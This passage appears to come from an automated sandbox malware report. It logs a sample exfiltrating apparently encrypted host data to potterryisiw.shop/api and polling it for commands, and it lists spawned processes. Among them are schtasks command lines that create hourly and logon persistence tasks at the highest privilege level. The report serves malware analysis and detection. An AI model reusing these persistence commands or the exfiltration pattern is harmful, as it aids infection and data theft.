0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70 73 18 36 bb db d0 80 86 13 83 8d c6 aa a3 fb 8b 31 7e 5c 25 eb 9a 12 24 26 b8 e7 c9 1a 33 09 f9 10 5c a4 fe aa 5a 6e 96 Data Ascii: IZ?_0QS;=zr\RhhpeR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@ps61~\%$&3\Zn
2024-07-01 07:16:43 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r1i1u3r6huot1incmfn9s2o5fk; expires=Fri, 25-Oct-2024 01:03:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7rG9JZQbNvThusKTYfJkW6rlAO1bOhE1oI4YD%2FyHzXungXvLO56NERoMxYUQjs1nryuJlW21KYnNrT58LySxGF16yWrYkQh%2BdcVrdOVVYxtTiiweesXzF8tO35QMq83%2B%2BC%2Bxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49cb0ef1e422b-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49830	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:42 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 580138 Host: potterryisiw.shop
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"C4420F3912B23C705E0F544319C54822--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl--defau
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: 0d 79 01 16 88 04 b0 1b b7 69 2a 8d 76 68 07 ac 98 b3 d9 57 69 17 81 8d 56 d4 ca 7e e8 31 ea 9d 76 66 e7 13 97 58 15 a4 d7 55 bf fd 7f 1b 8c 90 cb 35 40 ff d0 0a 66 70 20 c6 84 9a cb 46 0a 4e 10 88 30 0d 6b 8d d1 58 8f 78 56 1e c5 53 04 b5 b9 9b 12 78 30 12 de e2 a1 d8 b7 59 42 cc 83 92 dd 02 c0 26 31 dd de 0d 07 1a e5 16 ae 98 a0 a3 44 9e db 97 40 b2 ca 30 55 64 bb 48 83 e6 bd f1 29 25 24 f6 8b 31 4b a8 43 92 ee b0 09 45 0e 0e c4 bf fc 3d ae cc 9d d0 8c a3 56 9a c9 a8 f7 c3 d2 5d 45 c0 d2 85 3b 59 54 8c 29 3c 8f 99 a3 a4 6e 35 fa 3a cb b1 eb 1c 08 9b c4 15 b9 ea 8d 3a 93 11 1f 5b 69 2a 99 99 81 85 c5 97 35 a6 de 2e 01 ef 3d 34 2d b4 3f 1f 98 fc 89 5e d8 20 04 18 3d 30 0f 2c 92 b3 86 c8 23 75 35 5f 13 bf 72 47 8c 5d df f5 93 78 e7 df 27 68 f0 c4 a2 b6 3e Data Ascii: yivhWiV~1vfXU5@fp FN0kXxVSx0YB&1D@0UdH)%$1KCE=V]E;YT)<n5::[i5.=4-?^ =0,#u5_rG]x'h>
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: 10 d5 f8 0f 41 7f db 7a a1 e6 12 ac a1 21 7d 32 52 7e a4 3a 06 2c a5 d0 88 c3 d2 43 e9 66 77 65 8e c2 6b c6 a1 66 b1 44 4f 1c 19 b3 a0 73 bd f1 93 de 4c 98 52 9b 19 ec df 62 14 b5 f2 1d 1b e5 e9 bd e1 31 40 b2 67 fc 14 3d 69 ed 2a 13 e4 bd 87 3c 37 f4 34 82 fc 53 c0 ce 93 5f 35 5b 69 23 c3 d3 62 7c 7b c8 f8 a5 a5 45 88 a3 00 fe 00 e7 b9 e4 f6 a9 57 cd 5f e4 18 b0 bf d7 7c 4f 4f d0 d4 cc b9 c8 8c b9 8f 9a 48 bc 3f 29 dd f1 3b 1e 45 6c 7e 56 fd 73 bd 49 8a a1 cc 69 bb 43 34 0b fc b1 d6 78 96 80 aa fd cb b6 f9 ab 62 7d e0 5e f6 70 aa d3 2a 69 a4 01 35 76 19 58 44 53 f1 33 f8 65 c9 5f 45 c4 33 4e f6 33 f2 43 0a 69 56 d4 6c 38 7e 30 9a f5 c0 83 a6 82 aa 31 8a f0 be ea b9 85 1f bb 9c df aa 0d 7a a5 42 a5 17 2f 64 bb 2a 56 5f 9d 3b cc 34 ae ad e6 95 e9 b8 86 32 Data Ascii: Az!}2R~:,CfwekfDOsLRb1@g=i<74S_5[i#b\|{EW_\|OOH?);El~VsIiC4xb}^pi5vXDS3e_E3N3CiVl8~01zB/d*V_;42
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: 5f 5d dc 60 1a 2d 08 80 bb 01 25 07 3f f4 2b 70 70 50 fb 61 38 85 d6 d7 1a 91 ee f3 d0 b1 37 2b b3 73 b7 ac 87 a5 85 5b cf 78 33 1d 38 8f 04 bf ab c6 8c 3a 8f fc a3 54 c9 5e 9f ba 34 87 f5 19 a4 dd 6c 1d 32 7b 70 98 7b 77 af 40 9e 2e 02 fb c8 88 c4 75 be cc 50 fb 20 77 94 03 63 a7 41 b6 ee 90 ff 35 61 b0 70 56 10 2c 87 b1 77 02 87 3e 71 3b 63 88 a0 9f c3 aa d9 e7 eb f7 06 9c c5 4c d7 0f 08 39 46 58 6e 84 ec 7a 08 26 76 1c 1b c2 b1 2e 66 fc 6b f7 95 ca 61 d2 57 59 9f 49 1d bd 76 d9 f1 8f 84 d9 c1 d0 d7 44 f2 a4 bf 74 6c 45 f4 01 54 f1 ac 7f ac 9b bc c1 8f 3d 6f 4d f0 85 61 d6 ca 20 99 ac ad 7c f3 9f 8c 37 d2 12 af 72 1f 8d 36 b3 9e c5 b5 df d1 fb 84 ca 3b 21 5f 24 d1 9e f4 45 5d 55 51 6f fe 2e 00 62 70 73 18 71 93 2a 9f e8 1d 7a dc 93 5b 40 13 b0 97 0b 7c Data Ascii: _]`-%?+ppPa87+s[x38:T^4l2{p{w@.uP wcA5apV,w>q;cL9FXnz&v.fkaWYIvDtlET=oMa \|7r6;!_$E]UQo.bpsq*z[@\|
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: d4 f4 c1 b3 d9 1e 19 e1 1c 8e 2f 0e 2e 78 e6 2f 5f d2 df 11 45 7e ec 8a 2a 34 ce 60 e4 5d c1 dd 49 dc 9d d9 13 bd d4 06 80 80 2c 14 86 8a c8 85 01 de 8c 18 bd 1f 8d 20 32 19 4e 10 73 c3 c9 46 fc 78 5f ff 6b bf 2c 44 be 21 d8 b3 f5 bf 22 e4 ff 75 53 c6 71 8e f2 34 07 40 f9 26 0f 3b cf 9d cd 69 a7 a0 58 e4 cf 0f 1e ce 94 dd cc f3 21 52 6a 1f b6 66 5e e3 05 87 d5 f9 60 04 c8 b8 be a6 43 fa af fd 90 10 8b c7 72 1d dd 6e f5 9b 93 da da 7c fc ed 41 9d 55 c9 99 a0 3c a1 51 2c 38 0b d9 73 01 b3 55 84 96 cb 0d 19 48 99 5e 44 da 87 f3 47 08 4f 5d f3 53 03 ce e8 95 6b 13 bd 95 c8 2d f9 39 14 e8 d2 8b 18 1a 1f 20 b7 5f cc 6c 8c 10 1a 3b 7d 25 0d 92 12 3c 02 e7 58 18 7d 46 d2 15 05 12 fb c3 8f 5e 38 01 aa b9 46 2f f2 dd 83 ee 7a 4a 3c 39 1c 86 0c 13 c5 b9 fe 59 fb 6a Data Ascii: /.x/_E~*4`]I, 2NsFx_k,D!"uSq4@&;iX!Rjf^`Crn\|AU<Q,8sUH^DGO]Sk-9 _l;}%<X}F^8F/zJ<9Yj
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: 67 8d 6c 0d 69 cf a9 94 0b 82 75 c2 40 b3 5b 88 14 bf 29 f6 13 d6 e9 f2 c2 65 d6 23 fb e2 ee 35 d9 36 2b e3 fd fb f1 b9 6f 60 49 e7 e4 3d 60 64 0c e0 65 79 a6 bb 35 20 b8 32 b1 fb b7 d3 58 4d a6 44 61 ee 31 58 9c ff 52 ea 7e fc 31 d8 5f a9 14 17 8c 2c 45 6a b3 f4 c3 2a 67 4e 4f 93 2d b1 f3 47 eb 15 b1 4d 8c ec cc d2 78 c0 e3 e4 c4 39 cc 32 42 68 1e c6 5c 7f 76 98 5d a4 e2 a9 e9 cb 39 c1 fe 1e 48 d1 fc 08 da 1a 83 bb 96 9b aa 67 78 f6 2d 99 bf 35 4f 42 e2 11 54 ed 3d 38 5c 92 8a a9 42 7a 98 7e 0b aa 44 a0 61 48 29 60 66 f4 87 2b d7 f1 8c 43 76 48 c6 68 51 92 8e 72 f0 22 a7 88 89 3d 3e 8c e9 8a a1 e2 f7 f6 db 72 c6 a1 5a 85 ca a7 a4 71 3d 18 b4 5b a7 05 e3 b7 3a 69 56 f8 8a 45 fa 93 a8 08 90 f1 f7 b9 bf 44 58 a5 18 10 78 51 1c 0f e1 a9 24 bb 20 65 c7 4f 55 Data Ascii: gliu@[)e#56+o`I=`dey5 2XMDa1XR~1_,Ej*gNO-GMx92Bh\v]9Hgx-5OBT=8\Bz~DaH)`f+CvHhQr"=>rZq=[:iVEDXxQ$ eOU
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: 4b d4 47 be 6c da 1d 54 d9 c1 e3 10 8f 6a 10 cd 61 b8 fd 5b 14 1e b9 58 ae 03 e7 7b 2f 5f 84 cd 10 40 4a a7 2e 37 25 2b 67 7d d2 66 b4 c2 88 b3 13 1d 62 a4 1a 93 2f 21 e5 d8 00 89 4a f9 23 50 fb 49 21 06 db 5f 2f 19 0a 15 dc 7a 1d 4f b3 d5 01 10 27 e1 33 67 b9 2f 37 74 fd bb 7d 82 34 b0 ac 9e 7e cc 0f e6 f4 61 03 4a 20 f8 10 92 02 31 86 a3 44 40 63 11 65 af 6e ef 07 17 72 c9 d2 fb 77 ed 5f 57 ed 1e d8 0d 0f 0d c0 58 03 de ad 67 3c 6a 36 27 00 90 cb 06 4b 51 f2 8f 8d de dd b8 c5 09 74 b9 4a b1 1a 4e 25 81 a2 b4 e1 99 a6 bc 8f 3a 26 24 34 cf 0d 01 af 61 1d 0b 0f 97 d9 8f 5c ec 82 41 af 71 11 d2 62 46 60 74 ea dd d5 f6 bd 71 ea 23 59 72 88 bb 3e 96 d4 8c a0 d6 1f 22 3c 2d bd b2 2f 78 03 56 d5 b3 21 70 2c 8a f2 bf 4e c8 73 72 22 ff bb 8c f4 44 07 0a 92 85 e4 Data Ascii: KGlTja[X{/_@J.7%+g}fb/!J#PI!_/zO'3g/7t}4~aJ 1D@cenrw_WXg<j6'KQtJN%:&$4a\AqbF`tq#Yr>"<-/xV!p,Nsr"D
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: e7 26 61 39 15 01 b7 0a 6f fc 79 6e b1 3b fc fc 69 60 0e 6a 8b 1e 7e f5 b1 19 55 a5 29 26 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e 10 d9 95 74 b8 ea 61 35 e7 0c f4 ca 7f 7d 63 28 e4 0a 38 58 56 dd e6 cd 9e 7e 78 20 b7 a6 73 4d 87 93 57 69 a3 39 32 38 Data Ascii: &a9oyn;i`j~U)&PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1ta5}c(8XV~x sMWi928
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: 3d 57 fa 6d c7 ca a6 3c 16 1f ef 14 06 51 9b 25 9f c2 ed de cd 25 32 12 c7 c4 e7 f4 45 42 d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf 3b 24 26 84 f6 fb 7d a8 03 10 d3 c2 2f 46 7e 4d d4 4e 42 13 e5 91 1d 1d 14 29 17 e2 4f 7a e1 52 dd 41 64 c0 63 c8 aa 31 Data Ascii: =Wm<Q%%2EB8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X;$&}/F~MNB)OzRAdc1
2024-07-01 07:16:42 UTC	15331	OUT	Data Raw: 49 cb 5a 1c 9c 3f 5f 30 18 ec be e4 1b 51 53 3b 3d 7a 72 5c 9f f9 52 f6 89 c2 68 80 df 68 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70 73 18 36 bb db d0 80 86 13 83 8d c6 aa a3 fb 8b 31 7e 5c 25 eb 9a 12 24 26 b8 e7 c9 1a 33 09 f9 10 5c a4 fe aa 5a 6e 96 Data Ascii: IZ?_0QS;=zr\RhhpeR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@ps61~\%$&3\Zn
2024-07-01 07:16:44 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=843jkdooqoc7mdb37fas5iind4; expires=Fri, 25-Oct-2024 01:03:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GON5I4nB%2Fxdvf7RrzkxqaK%2B3d7AN%2BbNjAJZoj5eSnHXSu%2Fbi7Zz2X7woXfLl8aMXn2m%2B%2B1KM8xCbG00Enw0cW54iolg2HlWY%2BZ2Yi92YRinSkytVaMXfPM1N7rcDWOmPj6YT%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49cb3ef7f7c84-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49831	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:43 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: potterryisiw.shop
2024-07-01 07:16:43 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d 26 68 77 69 64 3d 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--default2806&j=&hwid=C4420F3912B23C705E0F544319C54822
2024-07-01 07:16:44 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hbp8h748qc41acpdgvddecaul4; expires=Fri, 25-Oct-2024 01:03:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rcsw9s6%2BcFdVn5%2FD%2B3pR9W7g2%2BCcpL7tAfHV5ZAmUSsq%2BkJ1Ur7%2F8C8vLDf%2Fcy0aXhNvN2UnzaiDbAz1YfeF4p7m5cxK3bBHprVDkVfHqkkhm%2BodPUzrGaTcDji9elwZACL6Sg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49cbd6f9a0f91-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:44 UTC	54	IN	Data Raw: 33 30 0d 0a 51 48 64 77 30 4e 49 73 5a 79 7a 33 6c 69 36 32 36 4f 6f 69 71 5a 30 45 55 2b 56 6f 6e 6a 76 52 78 6b 43 79 78 42 74 44 6c 31 6b 62 4b 67 3d 3d 0d 0a Data Ascii: 30QHdw0NIsZyz3li626OoiqZ0EU+VonjvRxkCyxBtDl1kbKg==
2024-07-01 07:16:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49832	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:44 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: potterryisiw.shop
2024-07-01 07:16:44 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d 26 68 77 69 64 3d 43 34 34 32 30 46 33 39 31 32 42 32 33 43 37 30 35 45 30 46 35 34 34 33 31 39 43 35 34 38 32 32 Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--default2806&j=&hwid=C4420F3912B23C705E0F544319C54822
2024-07-01 07:16:45 UTC	806	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9j4iq9acn59n91umcai59aa509; expires=Fri, 25-Oct-2024 01:03:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bZVhKDEAF8yhLzD3PeevWV6wZyuVE2aT1uzfEToz31LhcY7VO75f0wv918iilhv5DaAhd5qC5VbjvFOG9nvRprzkiTzSzX%2FGY91FejP9iZpwAfLHdztuO3tPlRCA%2B%2FGmIB%2Bu8w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49cc56b4741ec-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:45 UTC	54	IN	Data Raw: 33 30 0d 0a 58 66 5a 37 36 6b 79 6d 4c 48 5a 48 4e 69 43 6d 57 70 68 5a 32 79 35 47 6c 4f 56 63 71 65 5a 5a 66 6b 76 63 4a 53 30 79 7a 67 67 47 71 77 3d 3d 0d 0a Data Ascii: 30XfZ76kymLHZHNiCmWphZ2y5GlOVcqeZZfkvcJS0yzggGqw==
2024-07-01 07:16:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:16:00
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\zyJWi2vy29.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\zyJWi2vy29.exe"
Imagebase:	0x320000
File size:	1'854'464 bytes
MD5 hash:	97768AB0A4837757B74DE2AE892BADAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:16:00
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:16:01
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:16:01
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xc30000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:16:01
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7548 -ip 7548
Imagebase:	0xa70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:16:01
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 324
Imagebase:	0xa70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:16:13
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xd50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:16:14
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:16:14
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0x210000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:16:14
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:16:14
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe"
Imagebase:	0x6d0000
File size:	1'854'464 bytes
MD5 hash:	97768AB0A4837757B74DE2AE892BADAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:16:14
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:16:15
Start date:	01/07/2024
